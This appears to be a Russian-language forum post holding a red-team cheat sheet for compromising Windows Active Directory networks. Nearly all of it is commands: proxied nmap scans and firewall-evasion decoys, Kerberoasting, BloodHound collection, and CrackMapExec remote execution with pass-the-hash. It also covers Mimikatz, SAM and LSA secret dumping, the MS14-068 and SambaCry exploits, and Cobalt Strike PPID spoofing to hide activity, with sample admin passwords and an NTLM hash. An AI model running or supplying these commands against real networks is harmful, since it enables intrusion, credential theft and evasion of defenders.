Разведка сети

d0ppl4r

Старшина
Сообщения
46
Реакции
30
-----------------------Nmap network scanning AD--------------------
1. Раздведка OC and ports
proxychains nmap -T5 -A -PO 192.168.10.0/24
nmap -sP 192.168.10.0/24
proxychains nmap -PN -v -T4 192.168.10.0/24
xmass + arhitecture
proxychains nmap -T5 -A -sX 192.168.10.0/24
all port scanning
proxychains nmap -T5 -A -p- 192.168.10.0/24
proxychains nmap -p 1-65535 -T4 -O -A -v 192.168.10.0/24
no ping scanning
proxychains nmap -T5 -Po 192.168.10.0/24
script scanning
proxychains nmap -T5 -sC 192.168.10.0/24
proxychains nmap -sW 192.168.10.0/24
2. Host сканирование
nmap -v -sC -sV -oA nmap/active
proxychains nmap -F --open 192.168.10.1
proxychains nmap -O -v 192.168.10.1
proxychains nmap -T4 -A -v 192.168.10.1
proxychains nmap -T4 -sA -v 192.168.10.1
proxychains nmap -sT -T4 192.168.10.1
proxychains nmap -sA -T4 192.168.10.1
proxychains nmap -sV -T4 192.168.10.1
proxychains nmap -n -vvv -sS -sV -sC -oA nmap/version —stylesheet nmap-bootstrap.xsl 192.168.10.1
#Host Discovery
netdiscover -r 192.168.10.1/24
4. Firewall bypass
nmap -f --mtu=512 -D RND:10 --source-port 443 --data-length 20 --spoof-mac Apple 192.168.10.1


Tools
#Resource

---------------------------SPN network scanning -----------------------------------------
(помогает найти какие есть сервисы, замена nmap !МЕНЕЕ ШУМНЫЙ!)(sql,rdp, vmware and etc )

Command line
#CobaltStrike
shell setspn -T POOP.local -Q */*
shell for /L %i in (1,1,255) do @ping.exe -n 1 -w 50 <10.10.10>.%i | findstr TTL
nslookup -type=all _ldap._tcp.dc._msdcs.rootkit.org
#Impacket
python GetUserSPNs.py -dc-ip 10.0.0.1 pentestlab.local/test
python GetUserSPNs.py -request -dc-ip 10.10.14.15 m0chanad.local/serviceaccount
python GetUserSPNs.py -request -dc-ip 192.168.10.109 POOP.local/Администратор
python GetUserSPNs.py -request -dc-ip 192.168.10.109 POOP.local/ipetrov -no-pass


Other
1.
pip3 install adidnsdump
adidnsdump -u $domain\\$user -p "$pass" $dc
2.
pip3 install ldapdomaindump
ldapdomaindump -u $domain\\$user -p "$pass" $dc

records.csv |cut -d "," -f3
cat domain_computers.json |grep -A1 dNSHostName | cut -d '"' -f2 |grep -v "dNSHostName"

Tools
1. SharpRoast is a C# port of various PowerView's Kerberoasting functionality.
SharpRoast.exe all
2.
#CobaltStrike
execute-assembly SharpAdidnsdumpis.exe dc-address



Ther
--------Vuln nmap scanning ---------------------------
Сканирование CVE RCE:
1. ms17-010
nmap -Pn -p445 --script=smb-vuln-ms17-010 host
2. ms08-067
nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 host
nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 host
3. ms10-061
nmap -Pn -p 445 -vv --script=smb-vuln-ms10-054.nse host
nmap -Pn -p 445 -vv --script=smb-vuln-ms10-061.nse host
4.
nmap -Pn -p 445 -vv --script=mb-vuln-cve2009-3103.nse host
nmap -Pn -p 445 -vv --script=smb-vuln-ms06-025.nse host
nmap -Pn -p 445 -vv --script=smb-vuln-ms07-029.nse host
nmap -Pn -p 445 -vv --script=smb-vuln-ms08-067.nse host




SMB packet sign detection
1. Nmap
nmap --script smb2-security-mode -p137,139,445 192.168.10.0/24 -oA smb-check
nmap --script smb-security-mode.nse -p445
nmap -sU -sS --script smb-security-mode.nse -p U:137,T:139 <IP_or_range>
/usr/share/responder/tools/RunFinger.py <IP_or_range>
if Message signing enabled and required
То нельзя
if Message signing enabled and not required
можно
2.
nmap -p445 --script smb2-vuln-uptime --script-args smb2-vuln-uptime.skip-os=true 192.168.10.0/24

3.
nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 target

4.
nmap -n —script safe -oA nmap/nse-smb-enum -p445
cat nmap/nse-smb-enum.nmap


CVE
1. MS14-068 Exploit.
python goldenPac.py MARVERL/Administrator:[email protected]
2. CVE-2017-7494
./sambaPipe.py -so poc/libpoc.linux64.so [email protected]
3.
CVE-2018-8581

3.

NSE
-------------------------- AD recon -------------------------------------------------------
Basics
Перед сканированием нужно сделать parent child process (это значит что cmd.exe будет открываться от notepad а не от beacon помогает
при скрытие активности в сети )
1. Выполнять команды от легитимного процесса
ppid pid
2. Запустить новую сессию от легитимного процесса
runu 2696 beaconx86.exe
Basics command line net.exe (net.exe хорошо детектиться и поэтому её использовать не всегда)
1. Показывает системную информацию
shell systeminfo
2. Получить список юзеров
shell net users
shell wmic computersystem list
shell wmic useraccount list /format:list
3. Статус юзера
shell net users *name*
shell wmic sysaccount list /format:list
4. Показывает локальные группы
shell net localgroup
5. Показывет конфигурацию парольной палитики для пользователей
shell net accounts /domain
shell wmic group list brief
6. Показывает все домены в AD
shell net view /domain
nltest /domain_trusts
shell wmic computersystem get Name,domain,NumberofProcessors,Roles,totalphysicalmemory
7. Показывает время на домене
shell net time /domain
8. Показывает имя ДК (Get domain name)
shell echo %USERDOMAIN%
shell echo %USERDNSDOMAIN%
shell echo %LOGONSERVER%
9. Поепзывает группы в домене
shell net group "name" /domain
shell net group "enterprise admins" /domain
shell net group "domain controllers" /domain
shell net group "domain computers" /domain
shell wmic group list /format:list
10.
net sessions
11. Получить список контроллеров домена в домене
shell nltest /dclist:domain
12.
shell nltest /domain_trusts
13. list domain
shell nltest /DCLIST:DomainName
shell nltest /DCNAME:DomainName
shell nltest /DSGETDC:DomainName
powershell Get-Domain
shell nslookup -type=srv _kerberos._tcp.<fqdn_domain>
14.Получение списка всех пользователей в домене (доступно всем юзерам в домене)
shell net user /domain
15. Информация групповой политики пользователя
shell gpresult /z
16.
shell net computers

---------------Сеть---------------------
1. Показывает все сетевые карты на хосте
shell ipconfig /all
2. Показывает все маршруты
shell route print
shell arp -A
shell netstat -ano
3. Аптайм
shell net time
4. Показывает сведения о пользователе
shell whoami /all
5. Показывает сведения о правах
shell whoami /priv
6. Показывает все процессы
shell tasklist /SVC
Еще один способ посмотреть процессы
shell wmic process get CSName,Description,ExecutablePath,ProcessId
shell wmic process list brief
shell wmic service where (state="running") get caption, name, startmode, state
7. Состояние firewall
shell netsh advfirewall show allprofiles
8. Состояние служб
shell sc query
shell netsh wlan show profiles
9. Состояние драйверов
shell DRIVERQUERY
shell wmic logicaldisk get caption,description
powershell Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
10. Состояние служб
shell wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName
11. Просмотреть программы которые в автозапуске
shell wmic startup get Caption,Command,Location,User
12. Программы которые установленны.!
shell wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version
shell wmic product get name
13. Показывает обновление системы!
shell wmic qfe get Caption,Description,HotFixID,InstalledOn
14. Статус юзера
shell sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
net group "MARVERL" /domain | findstr "FILE"
15. Переменные среды
shell wmic process list /format:list
shell wmic environment get Description, VariableValue
16. guid domain
shell wmic ntdomain list /format:list
17. получить все SID
shell wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status
18. Terminate a process
shell wmic process where name="explorer.exe" call terminate
19. Сервисы которые в авторан
shell wmic startup get Caption, Command
20. Получить всю системную информацию о хосте
shell wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpdate, NumberofProcesses, NumberofUsers, Organization, Registereduser, Status /format:list
Get the Motherboard Details
shell wmic baseboard get Manufacturer, Product, SerialNumber, Version
Get BIOS Serial Number
shell wmic bios, get serialNumber
Get Hard Disk Details
wmic diskdrive get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType /format:list


Awesome:


#Metasploit
PPID SPOOF
1. Main
-Получение информации о тачке
sysinfo
-Права пользователя
getuid
-Процесс лист
ps
-Сделать скриншот
screenshot
Просмотр сетевых интрейфесов
ipconfig
Просмореть где мы и какие файлы есть
ls -all

#Info (MEterpreter)
1. Показывает сеть
run get_local_subnets
2. Показывает все данные которые указанны в PATH
run post/multi/gather/env
3. Большой сбор различной информации (долгая)
run winenum
4. Марщритизация сети
route
5. Аптайм машины
idletime
6. Ищет домены
run post/windows/gather/enum_domains
use post/windows/gather/enum_domain_group_users
use post/windows/gather/enum_domain_tokens
use post/windows/gather/enum_domain_users
use post/windows/gather/lsa_secrets
post/windows/gather/enum_tokens
7. Показывает права текущего пользователя
run post/windows/gather/win_privs
8. Установленные программы
run get_application_list
9.
use post/windows/gather/netlm_downgrade
10. AD
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_ad_managedby_groups
run post/windows/gather/enum_ad_user_comments
run post/windows/gather/enum_ad_users


load extapi
1. Поиск всех компьютеров в домене
adsi_computer_enum poop.local
2. Поиск всех домен контроллеров
adsi_dc_enum poop.local
3. Поиск всех объектов в домене
adsi_group_enum poop.local
4.
adsi_user_enum poop.local
5.
adsi_nested_group_user_enum poop.local "CN=Domain Admins,CN=Users,DC=poop,DC=local"


Other
Покать что на рабочем столе
shell dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent"
#powershell
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Find Zombie
use auxiliary/scanner/ip/ipidseq


#CobaltStrike
----/Tools\--------
1. SharpView (for CS)
Compile on "TheCompileMachineVM"
Aggressor Script for CS:
Usage:


2. SharpAttack

3.

4.

5.



2. nopowershell
1. Загрузка nopowershell
nps Get-Whoami
nps Get-ComputerInfo
nps Get-LocalUser Administrator
nps Get-LocalUser
nps Get-LocalGroup Administrators
nps Get-ADGroup -Filter *


2.1
NOPOWESHELL

2.2


3. Recon AD
#CobaltStrike
1. Найти все компьютеры в домене
Recon-AD-Computers all
2. Найти все домен контрллеры
Recon-AD-Domain all
3. Найти все локальные группы
Recon-AD-AllLocalGroups all
4. Найти все группы
Recon-AD-Groups all
5. Найти локальные группы
Recon-AD-LocalGroups all
6. SPN сканирование
Recon-AD-SPNs
7. Найти всех юзеров в домене
Recon-AD-Users all


4.0 RedTeamCSharpScripts
LDAPUtility.cs

Usage: ldaputility.exe options domain [arguments]
#CobaltStrike
execute-assembly ldaputility.exe DumpAllUsers m0chan
execute-assembly ldaputility.exe DumpUser m0chan mr.un1k0d3r
execute-assembly ldaputility.exe DumpUsersEmail m0chan
execute-assembly ldaputility.exe DumpAllComputers m0chan
execute-assembly ldaputility.exe DumpComputer m0chan DC01
execute-assembly ldaputility.exe DumpAllGroups m0chan
execute-assembly ldaputility.exe DumpGroup m0chan "Domain Admins"
execute-assembly ldaputility.exe DumpPasswordPolicy m0chan

enumerateuser
Usage: execute-assembly C:\enumerateuser.exe domain
#CobaltStrike
execute-assembly /media/sf_BACK/enumerateuser.exe poop

WMI Utility
Also WMIUtility.cs for WMI Calls & LDAPQuery.cs for Raw LDAP Queries.
Usage: WMIUtility.exe options [arguments]
#CobaltStrike
execute-assembly /media/sf_BACK/WMIUtility.exe ListProcess
execute-assembly /media/sf_BACK/WMIUtility.exe ListService

Usage


4.1 BloodHound (Уставливает связи между юзерами и сервисами так же устанавливает всех доменных админов)
1. SharpHound

2.

3. Bloodhound-Python
git clone https://github.com/fox-it/BloodHound.py.git
cd BloodHound.py/ && pip install .
bloodhound-python -d m0chanAD.local -u m0chan -p Summer2019 -gc DOMAINCONTROLLER.m0chanAD.local -c all
bloodhound-python -d POOP.local -u Administrator -p 9Df697x6 -gc 192.168.10.109 -c all



6. PowerView (по протаколу LDAp)


7.

8. Проверка AV script (нужно загрузить отдельный агрессор скрипт)
AV_Query

Other
5. WatchAD




-----------------------Network Enumitanional --------------------------

1. Crackmapexec
CrackMapExec is installed on Kali or get Windows Binary from Github.

Has 3 Execution Methods
crackmapexec smb <- Creating and Running a Service over SMB
crackmapexec wmi <- Executes command over WMI
crackmapexec at <- Schedules Task with Task Scheduler

Can execute plain commands with -X flag i/e

crcakmapexec smb 10.10.14.0/24 -x whoami

crcakmapexec smb 10.10.14.0/24 <- Host Discovery
crackmapexec smb 10.10.14.0/24 -u user -p 'Password'
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --pass-pol
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --shares


Deferent exec options
crackmapexec smb 192.168.10.0/24 -u Administrator -p '9Df697x6' -d 'MARVERL'
crackmapexec smb 192.168.10.0/24 -u Administrator -p '9Df697x6' -d 'MARVERL' --exec-method smbexec
crackmapexec smb 192.168.10.0/24 -u Administrator -p '9Df697x6' -d 'MARVERL' --exec-method wmiexec
crackmapexec smb 192.168.10.0/24 -u Administrator -p '9Df697x6' -d 'MARVERL' --exec-method atexec
crackmapexec smb 192.168.10.0/24 -u Administrator -p '9Df697x6' -d 'MARVERL' -x ipconfig
mapexec <ip> -u <user> -H "<lm>" -x "<msfvenom psh-cmd>"
cme smb $hosts --gen-relay-list relay.txt
Crack with in HASH
crackmapexec smb 192.168.10.0/24 -u dpetrova -H 'aad3b435b51404eeaad3b435b51404ee:95bb8555c6f2b851299bbae243aa6485' -d 'POOP'

Enum AV Products
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M enum_avproducts

Running Mimikatz
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz

Dump Local SAM hashes
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth --sam

tools


2. SMB Enumerate
1.
nmblookup -A 192.168.1.103
2.
nbtscan 192.168.10.1/24
3.
smbmap -H 192.168.1.109
4.
smbclient -L 192.168.10.109
5.
rpcclient -U "" -N 192.168.10.109
rpcclient -U "10.10.14.14"
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser <user>
lsaquery
lookupnames Guest
lookupnames Administrator

Ther

Info
1.
python getArch.py -target 192.168.10.200
2.
python rpcdump.py MARVERL/Administrator:[email protected]
python rpcdump.py MARVERL/Administrator:[email protected]
3. Показывать имеенно пользователей в домене
python lookupsid.py MARVERL/Administrator:[email protected]
4.
python ifmap.py 192.168.10.200 135
5.
python GetADUsers.py MARVERL/Administrator:[email protected] -dc-ip 192.168.10.200
python GetNPUsers.py MARVERL/Administrator:[email protected] -dc-ip 192.168.10.200 -outputfile lol -debug
python GetADUsers.py -all active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100


Kerber
1. Клевая тула посомтри функционал


2.
3.


----------------------Scrennshot---------------------------
#Metasploit
1. Делает несколько скриншотов /root/.msf4/loot/тут фотки
run post/windows/gather/screen_spy
View:
sudo apt-get install fim -y
fim -a
2. Обчный скриншот
screenshot
3. screengrab
load espia
screengrab

#CobaltStrike
screenshot

TOols
SharpScreenshot.exe C:\Users\USER\Desktop\temp.jpeg
-----------------------List shares-----------------------------
Cpmmand line
#CobaltStrike
shell net share
16. List shares on the local host
wmic share get /format:list
17.
wmic /node: HYDRA share get

18
# List shares on a remote PC
net view HYDRA /all

1. crackmapexec
crackmapexec 192.168.10.0/24 --shares
crackmapexec 192.168.10.0/24 -u Administrator -p '9Df697x6' -d 'MARVERL' --shares
2.
smbclient -L 192.168.10.0/24
3.
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.10.0/24
4.
smbmap -H 192.168.10.0 -u Admin -R -P 445,139

#Metasploit
scanner/smb/smb_enumshares
post/windows/gather/enum_shares

Tools

--------------------Printer Hunting-----------------
1.

Exploitation

---------MySQL Recon (ATTAK)-------------------------------
nmap -sU --script=ms-sql-info host
nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
#Meterpreter
1.Bruteforce MSSQL Database
use auxiliary/scanner/mssql/mssql_login
2. Enumerate MSSQL Database
use auxiliary/admin/mssql/mssql_enum
3. Gain shell using gathered credentials
se exploit/windows/mssql/mssql_payload

Tools
2.




Awesome Meterials

Awesome network
https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
------> https://github.com/emilyanncr/Windows-Post-Exploitation <--------------
------> https://github.com/adon90/pentest_compilation <--------------
------> https://medium.com/@falconspy/useful-oscp-notes-commands-d71b5eda7b02 <--------------